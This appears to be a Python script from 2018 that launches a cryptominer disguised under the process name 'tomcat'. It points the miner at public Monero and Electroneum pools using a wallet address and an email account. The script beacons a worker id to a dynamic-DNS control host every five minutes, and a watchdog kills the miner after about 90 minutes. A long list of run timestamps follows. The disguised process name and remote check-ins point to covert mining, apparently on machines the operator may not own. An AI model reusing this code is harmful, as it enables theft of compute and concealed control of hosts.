import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:42:03.394758
#2018-02-17 16:28:02.171670
#2018-02-17 18:14:01.763169
#2018-02-17 20:01:05.848566
#2018-02-17 21:51:01.683194
#2018-02-17 23:36:01.240867
#2018-02-18 01:25:05.612758
#2018-02-18 03:12:04.479515
#2018-02-18 04:59:03.405636
#2018-02-18 06:51:01.611594
#2018-02-18 08:39:01.470932
#2018-02-18 10:24:07.000809
#2018-02-18 12:10:07.932002
#2018-02-18 13:56:01.279631
#2018-02-18 15:45:07.952888
#2018-02-18 17:36:01.502390
#2018-02-18 19:26:04.417740
#2018-02-18 21:12:05.787962
#2018-02-18 22:59:03.986326
#2018-02-19 00:47:01.287416
#2018-02-19 02:33:07.937047
#2018-02-19 04:19:07.748610
#2018-02-19 06:04:06.237338
#2018-02-19 07:52:06.834954
#2018-02-19 09:42:05.596248
#2018-02-19 11:31:07.697723
#2018-02-19 13:18:04.100087
#2018-02-19 15:05:11.928634
#2018-02-19 16:53:04.776012
#2018-02-19 18:39:04.560840
#2018-02-19 20:27:01.739596
#2018-02-19 22:15:06.370667
#2018-02-20 00:02:03.802247
#2018-02-20 01:48:07.078646
#2018-02-20 03:36:08.025505
#2018-02-20 05:22:07.510591
#2018-02-20 07:05:08.678522
#2018-02-20 08:51:01.876184
#2018-02-20 10:34:09.552774
#2018-02-20 12:19:06.984601
#2018-02-20 14:06:01.406859
#2018-02-20 15:49:01.958284
#2018-02-20 17:34:06.531504
#2018-02-20 19:21:08.890025
#2018-02-20 21:11:02.105290
#2018-02-20 22:57:07.689267
#2018-02-21 00:39:04.012020
#2018-02-21 02:26:04.175910
#2018-02-21 04:13:01.220350
#2018-02-21 05:59:05.107419
#2018-02-21 07:47:03.821919
#2018-02-21 09:33:05.687468
#2018-02-21 11:21:07.746873
#2018-02-21 13:11:04.457690
#2018-02-21 14:57:01.869168
#2018-02-21 16:46:15.671366
#2018-02-21 18:38:05.611562
#2018-02-21 20:23:03.948033
#2018-02-21 22:11:05.589235
#2018-02-22 00:02:07.205221
#2018-02-22 01:50:08.792394
#2018-02-22 03:37:06.527638
#2018-02-22 05:24:05.836803
#2018-02-22 07:09:08.198251
#2018-02-22 08:56:01.984498
#2018-02-22 10:44:04.362526
#2018-02-22 12:30:11.340783
#2018-02-22 14:14:01.499146
#2018-02-22 16:02:01.812299
#2018-02-22 17:47:04.758758
#2018-02-22 19:34:08.262483
#2018-02-22 21:26:07.786723
#2018-02-22 23:13:04.713066
#2018-02-23 00:58:05.792015
#2018-02-23 02:46:07.739272
#2018-02-23 04:35:02.833813
#2018-02-23 06:21:01.931670
#2018-02-23 08:07:04.620517
#2018-02-23 10:20:09.237396
#2018-02-23 12:14:09.542454
#2018-02-23 14:03:07.520284
#2018-02-23 15:55:08.743546
#2018-02-23 17:40:12.156354
#2018-02-23 19:26:08.090406
#2018-02-23 21:10:10.237540
#2018-02-23 22:57:04.001264
#2018-02-24 00:38:01.714591
#2018-02-24 02:27:07.576119
#2018-02-24 04:18:05.988917
#2018-02-24 06:05:02.865248
#2018-02-24 07:52:06.839276
#2018-02-24 09:37:06.441948
#2018-02-24 11:32:01.760936
#2018-02-24 13:22:06.202387
#2018-02-24 15:12:01.854313
#2018-02-24 17:01:04.009469
#2018-02-24 18:48:06.692886
#2018-02-24 20:39:04.221473
#2018-02-24 22:45:09.354187
#2018-02-25 02:07:03.813378
#2018-02-25 05:46:06.286021
#2018-02-25 11:37:02.409409